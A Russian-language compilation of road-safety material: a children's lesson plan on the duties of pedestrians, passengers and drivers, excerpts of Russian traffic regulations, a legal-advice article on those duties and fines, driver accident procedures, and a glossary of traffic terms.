Общие обязанности водителя пассажира пешехода

Конспект занятия по ПДД «Обязанности пешеходов, пассажиров и водителей»

ольга молодушкина
Конспект занятия по ПДД «Обязанности пешеходов, пассажиров и водителей»

Цель: профилактика детского травматизма.

— познакомить с правилами пешеходов, пассажиров и водителей;

— способствовать развитию внимания, наблюдательности;

— воспитывать у детей желание соблюдать правила дорожного движения.

Ход занятия.

— Ребята, здравствуйте! Сегодня мы с вами поговорим о том, как вести себя на улице,

вспомним правила дорожного движения и поиграем.

— Давайте вспомним, что обозначает аббревиатура ГИБДД? (Ответы детей).

Государственная инспекция безопасности дорожного движения.

-А кто главные участники дорожного движения? (пешеходы, водители, пассажиры).

— ПДД существуют для водителей, пешеходов и пассажиров.

Сейчас хочу познакомить вас с памяткой «Обязанности пешехода».

• Самое безопасное место для перехода – оборудованное светофором. Начинать переходить улицу можно только при зеленом сигнале светофора. Красный сигнал светофора запрещает движение пешехода и транспорта.

• Переходить дорогу нужно только по пешеходным переходам – “зебрам” – или на перекрестках. Не забывай, что идти через проезжую часть следует строго под прямым углом, потому что только так ты можешь полностью контролировать движение машин.

• В местах, где нанесена “зебра” или установлены специальные знаки, пешеход получает преимущество перед транспортом, но начинать переходить дорогу нужно только после того, как убедишься, что все машины остановились и пропускают тебя.

• Переходить проезжую часть лучше не по одному, а в группе людей. Но и здесь внимательно следи за транспортом – среди водителей могут оказаться недисциплинированные люди.

• Выйдя на проезжую часть, не отвлекайся на разговоры, не пользуйся сотовым телефоном и не играй в карманные электронные игры.

• Не беги и не спеши при переходе! Переходи улицу быстрым, уверенным шагом, не останавливайся и не отвлекайся. НИКОГДА не перебегай дорогу перед близко идущим транспортом.

• Даже на дорогах, где редко проезжает транспорт, во дворах домов, нужно быть всегда внимательным и не забывать о своей безопасности.

• Ходить следует только по тротуарам, придерживаясь правой стороны.

• Если тротуара нет, можно идти по обочине или по краю проезжей части, только обязательно НАВСТРЕЧУ движению транспортных средств.

В зимнее время стёкла автомобилей покрываются инеем и водителю очень трудно наблюдать за дорогой. Переход улицы перед близко идущим автомобилем всегда опасен, а сейчас тем более. Расстояние, необходимое для остановки автомобиля, на скользкой дороге увеличивается. Чтобы с тобой не случилось беды, не торопись, подожди, пока пройдёт весь транспорт. Не забудь, что движение пешехода может быть затруднено из-за гололёда на проезжей части.

Зимой световой день короткий, поэтому твоя одежда должна быть яркой. Желательно, чтобы на ней были световозвращающие элементы.

А сейчас немного поиграем. Игра «Знаки ПДД»

1. Почему нельзя перебегать дорогу перед близко идущим транспортом?

2. Как надо обходить стоящий автобус, троллейбус?

3. С какого возраста разрешается езда на велосипеде по улицам и дорогам?

4. Почему опасно играть в мяч на проезжей части?

5. Что означает желтый сигнал светофора?

6. Как и где лучше переходить улицу?

7. Почему нельзя цепляться за грузовые автомобили?

9. Где следует ожидать автобус, троллейбус?

10. Где должны ходить пешеходы при отсутствии тротуара?

11. Что означает красный сигнал светофора?

Следующая памятка «Обязанности пассажиров».

1. Ожидать общественный транспорт только на остановках.

2. Прежде чем зайти, выпусти тех, кто выходит из транспорта.

3. При нерегулируемом переходе улицы трамвай обходи спереди, а автобус и троллейбус сзади

4. В транспорте веди себя достойно:

• не шуметь и не толкаться;

• уступать места пожилым людям и инвалидам, женщинам с тяжёлыми сумками;

• держаться во время движения транспорта за поручни;

• не забывать оплатить свой проезд или предъявить проездной документ;

• никогда не стремиться сесть в транспорт на ходу (можно соскользнуть со ступенек и попасть под колёса автобуса);

• не входить в переполненный автобус, троллейбус, трамвай;

• острые и неудобные для других пассажиров предметы хорошо упаковывать и аккуратно ставить, чтобы никому не мешали.

Отдохнем. Игра «Дополни по смыслу».

1. Раньше счёта и письма,

Всем ребятам нужно знать

2. Не живая, а идет,

Неподвижна — а ведет. (Дорога.)

3. Высоких деревьев длинней,

Травиночки маленькой ниже.

С ней дали становятся ближе

И мир открываем мы с ней. (Дорога)

4. Тянется нитка, среди нив петляя,

Без конца и края.

Ни в клубок смотать. (Дорога)

5. Выходя на улицу

Вежливость и сдержанность,

А главное — (Внимание)

6. Здесь не катится автобус.

Здесь трамваи не пройдут.

Здесь спокойно пешеходы

Вдоль по улице идут.

Для машин и для трамвая

Путь-дорога есть другая. (Тротуар)

7. Лёша с Любой ходят парой.

Где идут? По (Тротуару)

8. Как зовутся те дорожки,

По которым ходят ножки?

Различать учись их точно,

Не лети как на пожар.

Пешеходные дорожки –

Это только? (Тротуар)

9. Ну, а если пешеходу

Тротуар не по пути?

Если нужно пешеходу

Сразу ищет пешеход

Знак дорожный …? (Переход)

10. Если ты спешишь в пути

Через улицу пройти

Там иди, где весь народ,

Там, где знак есть … (Переход)

Памятка «Обязанности водителей».

Водитель транспортного средства обязан уступить дорогу пешеходам, переходящим проезжую часть, по нерегулируемому пешеходному переходу.

Если перед нерегулируемым пешеходным переходом остановилось или замедлило движение транспортное средство, то водители других транспортных средств, движущихся по соседним полосам, могут продолжать движение, лишь убедившись, что перед указанным транспортным средством нет пешеходов.

На регулируемых пешеходных переходах при включении разрешающего сигнала светофора водитель должен дать возможность пешеходам закончить переход проезжей части данного направления.

Запрещается въезжать на пешеходный переход, если за ним образовался затор, который вынудит водителя остановиться на пешеходном переходе.

Водитель, помни! Дорога – зона повышенной опасности! Неукоснительно соблюдай Правила дорожного движения. Нарушения их может привести не только к потере транспортного средства и Вашей гибели, но и к массовой гибели пассажиров.

Помни! Безопасность перевозки пассажиров зависит, прежде всего, от того, как ее организует водитель. Перед поездкой ты должен проинструктировать пассажиров о порядке посадки и высадки из транспортного средства, а также о правилах пользования аварийными выходами. Нужно обратить особое внимание пассажиров на то, что стоять во время движения запрещено. Начинать движение водитель может, только убедившись, что условия безопасной перевозки пассажиров обеспечены.

Не превышай установленной скорости, не эксплуатируй неисправное транспортное средство, не допускай перегруза автобуса и не управляй транспортом в состоянии алкогольного или наркотического опьянения.

Все вышеуказанные нарушения Правил дорожного движения могут привести к трагедии на дороге. Во избежание таких случаев Государственная Инспекция Безопасности Дорожного Движения предупреждает всех водителей, занимающихся пассажирскими перевозками, соблюдайте Правила дорожного движения! Кто как не Вы должны чтить каждую букву «Закона дорог». Вы не имеете права быть легкомысленными, веди Вам доверено самое святое – человеческая жизнь!

На последок поиграем «ДА и НЕТ»

• Вы переходите дорогу на красный свет? (Нет)

• Вы катаетесь на самокате во дворе? (Да)

• Говорят, вы не уступаете место старшим в транспорте. Это правда? (Нет)

• А правда ли, что вы дорогу переходите на зеленый свет? (Да)

• Вы играете на проезжей части? (Нет)

• Точно ли, что на желтый свет светофора вы смело переходите дорогу? (Нет)

• Автобус нужно ли ждать на автобусной остановке? (Да)

• В этом зале есть дети, которые могут прокатиться на транспорте, прицепившись к нему? (Нет)

• А правильно ли будет, если будет отменен знак «Пешеходный переход»? (Нет)

• Так нужно ли соблюдать правила дорожного движения? (Да)

Акция по пропаганде ПДД среди детей, родителей, пешеходов и водителей Слайд:1 Вас приветствует д/с «Красная шапочка» с Дубовское, Слайд:- 2 В нашем детском саду профилактика дорожно-транспортного травматизма.

«Мои права и обязанности». Открытое занятие Министерство труда социального развития Краснодарского края Государственное казённое учреждение социального обслуживания Краснодарского.

Конспект непосредственно-образовательной деятельности для детей 5–6 лет «Права и обязанности детей» Цель:в игровой форме дать детям общее представление об их правах, развивать правовое мировоззрение. Обучающие задачи:Формировать представление.

Конспект непосредственно-образовательной деятельности по правовому воспитанию в старшей группе «Мои права и обязанности» Конспект непосредственно-образовательной деятельности по правовому воспитанию в старшей группе «Мои права и обязанности». Цель: Закрепить.

Конспект образовательной деятельности с использованием игровых ситуаций «Путешествие в город юных пешеходов» Конспект образовательной деятельности с использованием игровых ситуаций по социально – коммуникативному развитию в старшей группе «Путешествие.

Конспект по правилам дорожного движения в подготовительной к школе группе «Правила поведения пешеходов и пассажиров» Конспект по Правилам Дорожного Движения в подготовительной к школе группе: «Правила поведения пешеходов и пассажиров». Цель: ознакомление.

Конспект развлечения по ПДД в группе раннего возраста «Светофор — друг пешеходов» Конспект развлечения по ПДД в группе раннего возраста «Светофор – друг пешеходов» Составила воспитатель Павлова И. И. Цели: расширять знания.

Права, гарантии, обязанности родителей и ребенка Права, гарантии, обязанности… Наряду с детьми и педагогическими работниками, родители (законные представители) являются участниками образовательного.

Роль и обязанности отца в воспитании детей Роль отца в воспитании детей В современном мире такое понятие как семья у большинства людей ассоциируется в большей степени с матерью, а.

Обязанности пешеходов и пассажиров

  1. Обязанности пешеходов

1.1. Пешеходы должны двигаться по тротуарам, пешеходным дорожкам, велопешеходным дорожкам, а при их отсутствии — по обочинам. Пешеходы, перевозящие или переносящие громоздкие предметы, а также лица, передвигающиеся в инвалидных колясках без двигателя, могут двигаться по краю проезжей части, если их движение по тротуарам или обочинам создает помехи для других пешеходов.

(в ред. Постановления Правительства РФ от 22.03.2014 N 221)

При отсутствии тротуаров, пешеходных дорожек, велопешеходных дорожек или обочин, а также в случае невозможности двигаться по ним пешеходы могут двигаться по велосипедной дорожке или идти в один ряд по краю проезжей части (на дорогах с разделительной полосой — по внешнему краю проезжей части).

(в ред. Постановления Правительства РФ от 22.03.2014 N 221)

При движении по краю проезжей части пешеходы должны идти навстречу движению транспортных средств. Лица, передвигающиеся в инвалидных колясках без двигателя, ведущие мотоцикл, мопед, велосипед, в этих случаях должны следовать по ходу движения транспортных средств.

(в ред. Постановления Правительства РФ от 14.12.2005 N 767)

При переходе дороги и движении по обочинам или краю проезжей части в темное время суток или в условиях недостаточной видимости пешеходам рекомендуется, а вне населенных пунктов пешеходы обязаны иметь при себе предметы со световозвращающими элементами и обеспечивать видимость этих предметов водителями транспортных средств.

(абзац введен Постановлением Правительства РФ от 14.12.2005 N 767, в ред. Постановления Правительства РФ от 14.11.2014 N 1197)

1.2. Движение организованных пеших колонн по проезжей части разрешается только по направлению движения транспортных средств по правой стороне не более чем по четыре человека в ряд. Спереди и сзади колонны с левой стороны должны находиться сопровождающие с красными флажками, а в темное время суток и в условиях недостаточной видимости — с включенными фонарями: спереди — белого цвета, сзади — красного.

Группы детей разрешается водить только по тротуарам и пешеходным дорожкам, а при их отсутствии — и по обочинам, но лишь в светлое время суток и только в сопровождении взрослых.

1.3. Пешеходы должны переходить дорогу по пешеходным переходам, в том числе по подземным и надземным, а при их отсутствии — на перекрестках по линии тротуаров или обочин.

(в ред. Постановления Правительства РФ от 14.11.2014 N 1197)

На регулируемом перекрестке допускается переходить проезжую часть между противоположными углами перекрестка (по диагонали) только при наличии разметки 1.14.1 или 1.14.2, обозначающей такой пешеходный переход.

(абзац введен Постановлением Правительства РФ от 02.04.2015 N 315)

При отсутствии в зоне видимости перехода или перекрестка разрешается переходить дорогу под прямым углом к краю проезжей части на участках без разделительной полосы и ограждений там, где она хорошо просматривается в обе стороны.

1.4. В местах, где движение регулируется, пешеходы должны руководствоваться сигналами регулировщика или пешеходного светофора, а при его отсутствии — транспортного светофора.

1.5. На нерегулируемых пешеходных переходах пешеходы могут выходить на проезжую часть (трамвайные пути) после того, как оценят расстояние до приближающихся транспортных средств, их скорость и убедятся, что переход будет для них безопасен. При переходе дороги вне пешеходного перехода пешеходы, кроме того, не должны создавать помех для движения транспортных средств и выходить из-за стоящего транспортного средства или иного препятствия, ограничивающего обзорность, не убедившись в отсутствии приближающихся транспортных средств.

(в ред. Постановления Правительства РФ от 14.11.2014 N 1197)

1.6. Выйдя на проезжую часть (трамвайные пути), пешеходы не должны задерживаться или останавливаться, если это не связано с обеспечением безопасности движения. Пешеходы, не успевшие закончить переход, должны остановиться на островке безопасности или на линии, разделяющей транспортные потоки противоположных направлений. Продолжать переход можно лишь убедившись в безопасности дальнейшего движения и с учетом сигнала светофора (регулировщика).

(в ред. Постановлений Правительства РФ от 14.11.2014 N 1197, от 02.04.2015 N 315)

1.7. При приближении транспортных средств с включенным проблесковым маячком синего цвета (синего и красного цветов) и специальным звуковым сигналом пешеходы обязаны воздержаться от перехода дороги, а пешеходы, находящиеся на проезжей части (трамвайных путях), должны незамедлительно освободить проезжую часть (трамвайные пути).

(п. 4.7 в ред. Постановления Правительства РФ от 14.11.2014 N 1197)

1.8. Ожидать маршрутное транспортное средство и такси разрешается только на приподнятых над проезжей частью посадочных площадках, а при их отсутствии — на тротуаре или обочине. В местах остановок маршрутных транспортных средств, не оборудованных приподнятыми посадочными площадками, разрешается выходить на проезжую часть для посадки в транспортное средство лишь после его остановки. После высадки необходимо, не задерживаясь, освободить проезжую часть.

(в ред. Постановления Правительства РФ от 25.09.2003 N 595)

При движении через проезжую часть к месту остановки маршрутного транспортного средства или от него пешеходы должны руководствоваться требованиями пунктов 4.4 — 4.7 Правил.

(в ред. Постановления Правительства РФ от 25.09.2003 N 595)

2. Обязанности пассажиров

2.1. Пассажиры обязаны:

-при поездке на транспортном средстве, оборудованном ремнями безопасности, быть пристегнутыми ими, а при поездке на мотоцикле — быть в застегнутом мотошлеме;

-посадку и высадку производить со стороны тротуара или обочины и только после полной остановки транспортного средства.

Если посадка и высадка невозможна со стороны тротуара или обочины, она может осуществляться со стороны проезжей части при условии, что это будет безопасно и не создаст помех другим участникам движения.

2.2. Пассажирам запрещается:

-отвлекать водителя от управления транспортным средством во время его движения;

-при поездке на грузовом автомобиле с бортовой платформой стоять, сидеть на бортах или на грузе выше бортов;

-открывать двери транспортного средства во время его движения.

Основные обязанности пешеходов и пассажиров, чтобы избежать ДТП

Люди, участвующие в дорожном движении, могут иметь разный статус, то есть быть не только водителями транспортных средств, но также пешеходами и пассажирами. Их беспечное поведение, незнание ПДД, пренебрежение требованиями безопасности приводит порой к печальным последствиям. О том, каковы обязанности пешеходов и пассажиров, как избежать ДТП, выполняя их, читайте в этой статье.

Читайте в этой статье

Общие обязанности пешеходов и пассажиров

Для всех категорий участников дорожного движения есть правила, которые должны исполняться всеми, вне зависимости от статуса. Общие обязанности пешехода и пассажира закреплены в ПДД. К ним относят необходимость:

  • знать правила дорожного движения и придерживаться их;
  • уметь различать знаки регулировщика и слушаться их, если он управляет потоками машин и людей;
  • участвовать в движении, руководствуясь сигналами светофора при его наличии на отрезке пути;
  • понимать требования разметки и дорожных знаков, выполнять их;
  • не создавать помех движению, уважать других его участников, быть внимательным;
  • при сопровождении детей следить за тем, чтобы они не оказались в опасной ситуации (одни на проезжей части) и не создали ее для других людей;
  • отвечать за чистоту дорог и окружающей среды, то есть не засорять их мусором;
  • выполнять правила, предписанные для участников движения с конкретным статусом.

Все это способствует созданию на дорогах здоровой обстановки, порядка, то есть в конечном счете – общей безопасности.

А здесь подробнее о том, кто виновен в ДТП с наездом на пешехода.

Правила, прописанные в ПДД

Главный документ, которым должны руководствоваться участники движения, это «Правила дорожного движения». Он не имеет статуса закона. Но выдвигаемые им требования обязательны к исполнению. В ПДД подробно расписано, как должны поступать участники движения ради всеобщей безопасности, что им запрещается делать.

Дорогие читатели! Наши статьи рассказывают о типовых способах решения юридических вопросов, но каждый случай носит уникальный характер.

Если вы хотите узнать, как решить именно Вашу проблему — просто позвоните, это быстро и бесплатно!

Для водителей

Человек, находящийся за рулем транспортного средства, несет большую ответственность не только за свои жизнь и здоровье, но и других людей. Поэтому в ПДД обязанности пассажиров, пешеходов и водителей разделяются и конкретизируются. Для последней категории участников движения особенно важен раздел 2 правового документа, который требует:

  • иметь с собой и предъявлять сотруднику ДПС по его предписанию права на управление ТС, СТС, а также документы, разрешающие определенные виды деятельности (если он таксист, перевозит груз);
  • до начала движения пристегнуться ремнем безопасности и сделать так, чтобы им воспользовались пассажиры;
  • мотоциклист обязан надеть шлем и проконтролировать, чтобы защитное приспособление было на том, кого он везет;
  • следить за исправностью своей машины, вовремя предоставлять ее на профессиональную диагностику и ремонт;
  • садиться за руль в трезвом, адекватном состоянии, по требованию служащего ГИБДД проходить проверку на алкоголь и медосвидетельствование;
  • предоставлять свое ТС сотрудникам экстренных служб, если это необходимо по закону и сложившейся ситуации;
  • оставаться на месте ДТП, когда стал его участником и может обойтись без отправки в больницу;
  • оказывать медицинскую помощь пострадавшим в аварии;
  • соблюдать порядок движения, предписываемый знаками, разметкой;
  • не забывать о приоритете других ТС, если он установлен правилами.

При невыполнении автомобилистом, мотоциклистом какой-либо из обязанностей, из-за чего произошла авария, обычно они и несут ответственность, а не пешеход или пассажир. Большая часть статей КоАП за нарушение ПДД тоже относится к водителям.

Для пешеходов

Те, кто перемещается по дорогам не на транспорте, тоже несут свою долю ответственности за безопасность на дороге. Поэтому обязанности существуют и для пешеходов:

  • ходить по отведенным для них зонам (тротуары, специальные дорожки, левая сторона обочины);
  • в отсутствие этой возможности разрешено перемещаться на проезжую часть, но идти по ней с осторожностью, навстречу едущему транспорту (людям на инвалидных колясках – в попутном с ним направлении);

  • если приходится идти через дорогу в темноте, при плохой видимости или пользоваться обочиной, краем полотна, следует надевать световозвращающие приспособления;
  • при необходимости пересечь проезжую часть делать это по пешеходному переходу;
  • если его нет, на другую сторону перемещаются под прямым углом к автодороге в месте, где человек хорошо виден водителям;
  • выполнять требования регулировщиков движения и светофоров;
  • перед вступлением на «зебру» там, где нет светофора, оценивать расстояние до приближающихся машин, не спешить;
  • на проезжей части нельзя без уважительной причины останавливаться, задерживаться;
  • не успевшие добраться до тротуара на зеленый сигнал светофора должны ждать следующего на срединной линии проезжей части, где не едут машины;
  • следует пропускать во всех случаях транспорт спецслужб, движущийся с сиреной и зажженным проблесковым маячком;
  • ждать автобусы или такси на специально отведенных площадках.

Идя по тротуару с ребенком, взрослому лучше находиться со стороны проезжей части. Двигаться всегда нужно по правой стороне тротуара или «зебры», не спеша, но и не слишком медленно.

В границах жилой зоны и дворов, прилегающих к домам, у пешеходов тоже есть приоритет. Но и здесь они обязаны руководствоваться правилом 17.1:

Для пассажиров

Люди, пользующиеся транспортом не в качестве водителей, тоже должны содействовать безопасности движения. Правила и обязанности пешеходов и пассажиров имеют много общего. Но для второй категории существуют особые предписания:

  • они должны пользоваться ремнями безопасности, если кресло оборудовано приспособлением;
  • пассажир в ходе поездки должен вести себя так, чтобы водитель мог спокойно, без помех управлять машиной;
  • при невозможности выйти из ТС со стороны тротуара нужно покидать салон так, чтобы не создать угрозы другим людям и движению в целом;
  • если пассажир едет на грузовике с бортовой платформой, он не должен садиться и становиться на борта или груз, который выше их;
  • нельзя открывать дверцу авто, пока оно едет.

В некоторых случаях за проступки, совершенные пассажиром, приходится расплачиваться водителю ТС.

Существует ли наказание для пешеходов и пассажиров

Неисполнение обеими категориями участников движения возложенных правилами обязанностей означает нарушение закона. В отношении пешехода и пассажира могут применить часть 1 статьи 12.29 КоАП:

Если из-за проступка возникли препятствия движению ТС, работает часть 1 статьи 12.30 Кодекса:

При нанесении в результате пренебрежения обязанностями пешеходом либо пассажиром легкого или среднего ущерба здоровью другим людям применяют часть 2 той же статьи. Штраф по ней составит 1000-1500 р. Но потерпевший сможет подать и гражданский иск, требуя возмещения за полученный вред. А если другие люди пострадали тяжко, погибли, применяется и уголовная ответственность.

Обязанности пешеходов и пассажиров менее обременительны, чем водительские. Их выполнение бережет интересы прежде всего первых двух категорий участвующих в движении. И это в конечном счете работает на общую безопасность.

Полезное видео

Смотрите в этом видео о ПДД для пешеходов:

Не нашли ответа на свой вопрос? узнайте, как решить именно Вашу проблему — позвоните прямо сейчас (это быстро и бесплатно):

Обязанности водителей, пассажиров и пешеходов

Обязанности водителей

1. Водитель механического ТС обязан иметь при себе, а по требованию сотрудников полиции передавать им для проверки:

  • водительское удостоверение той категории, которая соответствует категории транспортного средства. К ТС категории А относятся мотоциклы, а к ТС категории В — легковые и грузовые автомобили с разрешенной максимальной массой не более 3,5 тонны, у которых количество предусмотренных конструкцией пассажирских мест не более восьми;
  • регистрационные документы (свидетельство о регистрации) на транспортное средство, а при наличии прицепа — и на прицеп;
  • страховой полис обязательного страхования автогражданской ответственности (ОСАГО);
  • в специально оговоренных случаях — другие документы, предусмотренные Правилами.

Пристегнуть
ремень безопасности

2. При движении на ТС быть пристегнутым ремнем безопасности и добиться от пассажиров, в том числе едущих на задних сиденьях легкового автомобиля, чтобы они тоже были пристегнуты ремнями.

При управлении мотоциклом быть в застегнутом мотошлеме и не перевозить пассажиров без застегнутого мотошлема.

3. Перед выездом проверить и в пути обеспечить исправное техническое состояние своего ТС.

4. По требованию сотрудников полиции проходить освидетельствование на состояние опьянения, которое может быть проведено на месте остановки либо в наркологической лаборатории.

5. Предоставлять своё ТС в случаях предусмотренных законодательством:

  • сотрудникам полиции;
  • сотрудникам федеральных органов государственной охраны;
  • сотрудникам ФСБ;
  • медицинским и фармацевтическим работникам для перевозки граждан в ближайшее лечебно-профилактическое учреждение в случаях, угрожающих их жизни.

Право остановки ТС предоставлено регулировщикам. Лица, обладающие правом остановки ТС, обязаны предъявлять по требованию водителя служебное удостоверение, или номерной жетон.

Водителю запрещается

Управление ТС в
нетрезвом виде

  • управлять транспортным средством в состоянии алкогольного, наркотического или иного опьянения, под воздействием лекарственных препаратов, ухудшающих внимание и замедляющих реакцию, в болезненном или утомленном состоянии, ставящем под угрозу безопасность движения;
  • передавать управление лицам, находящимся в таком состоянии;
  • употреблять опьяняющие вещества между совершением ДТП и прохождением освидетельствования на состояние опьянения, либо между остановкой с целью проведения освидетельствования и его проведением;
  • передавать управление лицам, не имеющим водительского удостоверения или не вписанным в страховой полис ОСАГО;
  • пересекать организованные транспортные и пешие колонны и занимать место в них;
  • управлять транспортным средством с нарушением режима труда и отдыха;
  • пользоваться во время движения телефоном, не оборудованным техническим устройством «хэнд-фри», которое позволяет вести переговоры без использования рук.

Действия водителя при ДТП

При дорожно-транспортном происшествии с пострадавшими или погибшими водитель, причастный к нему, обязан:

Выставить знак
аварийной остановки

  1. Немедленно остановиться, включить аварийную сигнализацию и выставить знак аварийной остановки. Не перемещать предметы, имеющие отношение к происшествию.
  2. Вызвать «Скорую медицинскую помощь» или спасателей (с мобильного телефона — по номеру 112). До их прибытия оказать первую помощь пострадавшим.В исключительных случаях допускается отправка пострадавших в ближайшее лечебное учреждение на попутном или на собственном транспортном средстве. В последнем случае после доставки пострадавшего в больницу участник ДТП обязан вернуться на место происшествия.
  3. Сообщить о случившемся в полицию (с мобильного телефона — по номеру 112). Записать фамилии и адреса очевидцев и ожидать прибытия сотрудников полиции.Освобождать проезжую часть можно только по команде сотрудников полиции. Однако если движение других ТС невозможно, то водитель должен зафиксировать в присутствии свидетелей все следы и предметы, имеющие отношение к происшествию и организовать их объезд. После этого можно освободить проезжую часть.
  4. Известить о происшествии свою страховую компанию. После оформления ДТП сотрудниками полиции заполнить совместно с другими участниками происшествия Извещение о ДТП. Впоследствии заполненное извещение подается в страховую компанию вместе с документами, оформленными сотрудниками полиции:
    • копией справки о ДТП;
    • копией протокола об административном правонарушении;
    • копией постановления по делу об административном правонарушении.

ДТП без пострадавших

ДТП без пострадавших

При ДТП без пострадавших необходимо выполнить пункты 1, 3 и 4. До прибытия полиции следует тщательно осмотреть место происшествия и повреждения на своем транспортном средстве.

Собранная вами информация может очень пригодиться при оформлении ДТП.

Если в ДТП нет пострадавших и разногласий между его участниками, то допускается вместо вызова ГИБДД самостоятельно приехать на ближайший пост ДПС или в подразделение полиции с составленной и подписанной обоими участниками схемой ДТП.

Поскольку схема ДТП является доказательством по делу о дорожно-транспортном происшествии, подписывать ее можно, только убедившись, что всё изображенное на схеме соответствует действительности.

Если в ДТП без пострадавших участвует только два ТС, владельцы которых имеют действующие полисы ОСАГО, и отсутствуют разногласия по поводу обстоятельств происшествия и характера причиненных повреждений, допускается не привлекать сотрудников полиции к оформлению происшествия, а ограничиться заполнением Извещения о ДТП, чтобы страховая компания возместила потерпевшему причиненный вред.

При этом потерпевший должен иметь в виду, что при упрощенной процедуре оформления максимально возможная сумма возмещения составляет 25 тысяч рублей. Если предварительная оценка причиненного вреда превышает эту сумму, необходимо оформить ДТП с привлечением сотрудников ГИБДД.

Обязанности пассажиров

1. Пассажиры обязаны:

  • во время поездки в транспортном средстве быть пристегнутыми ремнями безопасности, а при поездке на мотоцикле быть в застегнутом мотошлеме;
  • посадку и высадку из автомобиля производить со стороны тротуара или обочины и только после полной остановки. Посадка и высадка со стороны проезжей части допускается при условии, что это будет безопасно для пассажира и не создаст помех другим участникам дорожного движения.

2. Пассажирам запрещается:

  • отвлекать водителя во время движения;
  • при поездке на грузовом автомобиле с бортовой платформой стоять, сидеть на бортах или на грузе выше бортов;
  • открывать двери ТС во время его движения.

Обязанности пешеходов

  1. Пешеходы должны двигаться по тротуарам, обочинам или по пешеходным дорожкам. При отсутствии тротуаров, пешеходных дорожек и обочин пешеходы могут двигаться в один ряд по краю проезжей части навстречу движению транспортных средств.
  2. Пешеходы должны пересекать проезжую часть по пешеходным переходам, а при их отсутствии — на перекрестках по линии, продолжающей линию тротуара или обочины. На нерегулируемых пешеходных переходах и перекрестках пешеходы могут выходить на проезжую часть только после того как оценят расстояние до приближающихся ТС и их скорость, и убедятся в том, что переход дороги будет для них безопасен.
    При отсутствии в зоне видимости перехода или перекрестка разрешается переходить дорогу строго поперек проезжей части при условии, что участок дороги не имеет разделительной полосы и ограждений и хорошо просматривается в обе стороны.
  3. В местах где движение регулируется, пешеходы должны руководствоваться сигналами светофора или регулировщика.
  4. Если к месту, где пешеход переходит дорогу, приближается ТС с включенными спецсигналами (синим проблесковым маячком и сиреной), то пешеход должен воздержаться от перехода. Пешеход, который в этот момент уже находится на проезжей части, должен незамедлительно освободить ее, не создавая помех специальному ТС.
  5. Ожидать трамвай, троллейбус, автобус, маршрутное и обычное такси разрешается только на посадочных площадках, а при их отсутствии — на тротуаре или на обочине. Выходить на проезжую часть для посадки в ТС разрешается лишь после его остановки (это требование относится и к посадке в трамвай, остановившийся посередине проезжей части).

Методическая разработка урока на тему «Общие положения. Обязанности водителей, пешеходов и пассажиров. «

Идёт приём заявок

Подать заявку

Для учеников 1-11 классов и дошкольников

Описание презентации по отдельным слайдам:

Предмет «Основы законодательства в сфере дорожного движения» Урок 1 Введение. Обзор законодательных актов. Общие положения. Основные понятия и термины.

Автомагистраль «Автомагистраль» — дорога, обозначенная знаком 5.1 и имеющая для каждого направления движения проезжие части, отделенные друг от друга разделительной полосой (а при ее отсутствии — дорожным ограждением), без пересечений в одном уровне с другими дорогами, железнодорожными или трамвайными путями, пешеходными или велосипедными дорожками.

Автопоезд «Автопоезд» — механическое транспортное средство, сцепленное с прицепом (прицепами).

Велосипед транспортное средство, кроме инвалидных колясок, которое имеет по крайней мере два колеса и приводится в движение как правило мускульной энергией лиц, находящихся на этом транспортном средстве, в частности при помощи педалей или рукояток, и может также иметь электродвигатель номинальной максимальной мощностью в режиме длительной нагрузки, не превышающей 0,25 кВт, автоматически отключающийся на скорости более 25 км/ч.

Водитель «Водитель» — лицо, управляющее каким-либо транспортным средством, погонщик, ведущий по дороге вьючных, верховых животных или стадо. К водителю приравнивается обучающий вождению

Главная дорога «Главная дорога» — дорога, обозначенная знаками 2.1, 2.3.1 — 2.3.7 или 5.1, по отношению к пересекаемой (примыкающей), или дорога с твердым покрытием (асфальто- и цементобетон, каменные материалы и тому подобное) по отношению к грунтовой, либо любая дорога по отношению к выездам с прилегающих территорий. Наличие на второстепенной дороге непосредственно перед перекрестком участка с покрытием не делает ее равной по значению с пересекаемой.

Дорога «Дорога» — обустроенная или приспособленная и используемая для движения транспортных средств полоса земли либо поверхность искусственного сооружения. Дорога включает в себя одну или несколько проезжих частей, а также трамвайные пути, тротуары, обочины и разделительные полосы при их наличии.

Дорожно-транспортное происшествие «Дорожно-транспортное происшествие» — событие, возникшее в процессе движения по дороге транспортного средства и с его участием, при котором погибли или ранены люди, повреждены транспортные средства, сооружения, грузы либо причинен иной материальный ущерб.

Механическое транспортное средство «Механическое транспортное средство» — транспортное средство, приводимое в движение двигателем. Термин распространяется также на любые тракторы и самоходные машины.

Мотоцикл «Мотоцикл» — двухколесное механическое транспортное средство с боковым прицепом или без него. К мотоциклам приравниваются трех- и четырехколесные механические транспортные средства, имеющие массу в снаряженном состоянии не более 400 кг.

Обгон «Обгон» — опережение одного или нескольких транспортных средств, связанное с выездом на полосу (сторону проезжей части), предназначенную для встречного движения, и последующим возвращением на ранее занимаемую полосу (сторону проезжей части) (в редакции, которая вступит в действие с ноября 2010 года)

Обочина «Обочина» — элемент дороги, примыкающий непосредственно к проезжей части на одном уровне с ней, отличающийся типом покрытия или выделенный с помощью разметки 1.2.1 либо 1.2.2, используемый для движения, остановки и стоянки в соответствии с Правилами.

Остановка «Остановка» — преднамеренное прекращение движения транспортного средства на время до 5 минут, а также на большее, если это необходимо для посадки или высадки пассажиров либо загрузки или разгрузки транспортного средства.

Пассажир «Пассажир» — лицо, кроме водителя, находящееся в транспортном средстве (на нем), а также лицо, которое входит в транспортное средство (садится на него) или выходит из транспортного средства (сходит с него).

Перекресток «Перекресток» — место пересечения, примыкания или разветвления дорог на одном уровне, ограниченное воображаемыми линиями, соединяющими соответственно противоположные, наиболее удаленные от центра перекрестка начала закруглений проезжих частей. Не считаются перекрестками выезды с прилегающих территорий.

Перестроение «Перестроение» — выезд из занимаемой полосы или занимаемого ряда с сохранением первоначального направления движения.

Пешеход «Пешеход» — лицо, находящееся вне транспортного средства на дороге и не производящее на ней работу. К пешеходам приравниваются лица, передвигающиеся в инвалидных колясках без двигателя, ведущие велосипед, мопед, мотоцикл, везущие санки, тележку, детскую или инвалидную коляску.

Преимущество (приоритет) «Преимущество (приоритет)» — право на первоочередное движение в намеченном направлении по отношению к другим участникам движения.

Прицеп «Прицеп» — транспортное средство, не оборудованное двигателем и предназначенное для движения в составе с механическим транспортным средством. Термин распространяется также на полуприцепы и прицепы-роспуски.

Проезжая часть «Проезжая часть» — элемент дороги, предназначенный для движения безрельсовых транспортных средств.

